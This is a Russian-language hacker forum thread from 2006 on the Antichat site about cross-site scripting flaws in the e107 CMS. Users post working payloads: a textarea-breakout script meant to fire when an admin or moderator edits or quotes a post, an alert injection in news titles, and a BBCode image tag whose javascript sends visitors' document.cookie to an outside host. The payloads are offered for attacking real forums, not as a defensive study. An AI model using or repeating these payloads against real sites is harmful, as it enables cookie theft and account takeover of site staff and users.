ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

XSS в e107
  #1  
Старый 12.11.2006, 00:21
Аватар для Ponchik
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219

Репутация: 2274


По умолчанию XSS в e107

Хай! Вот выкладывал на одном форуме e107 HTML код, потом решил отредактировать, нажал, и увидел XSS При цитировании или редактировании сообщения, фильтрации нет Чё я имею в виду? Прём на e107 и пишем
Код:
</textarea><script>alert()</script>
и при нажатии на "Редактировать" или "Цитировать" выдаётся алерт, тоесть можно написать сообщение, и матернуться в нём, и админ или модер обязательно нжмут на "Редактировать"
 
Ответить с цитированием

  #2  
Старый 12.11.2006, 05:05
Аватар для dv0rnik
dv0rnik
Новичок
Регистрация: 10.11.2006
Сообщений: 9
Провел на форуме:
50847

Репутация: 2
По умолчанию

Так же есть уязвимость в добавить новость при вставке в тема или заголовок (точно не помню как правильно ) <scrip*t>alert(*)</scrip*t> выдаётся алерт тестировалось на локалхосте с последней версией счкачаной вчера
 
Ответить с цитированием

  #3  
Старый 19.11.2006, 19:42
Аватар для CtHuLhU
CtHuLhU
Новичок
Регистрация: 12.11.2006
Сообщений: 9
Провел на форуме:
95494

Репутация: 2
По умолчанию

HTML по дефолту разрешен админу. Обычным пользователям - нет. Потому на локалеке и катит.

вот ещё нашёл. правда же примитив? =)

[im*g]javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;[/im*g]

Последний раз редактировалось CtHuLhU; 19.11.2006 в 19:46..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
IE XSS Kit .Slip Чаты 22 23.10.2006 06:45
XSS worms Xex Статьи 0 02.10.2006 01:49
Xss черви и вирусы: сообщества уязвимых Utochka Чужие Статьи 3 28.08.2006 00:26
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ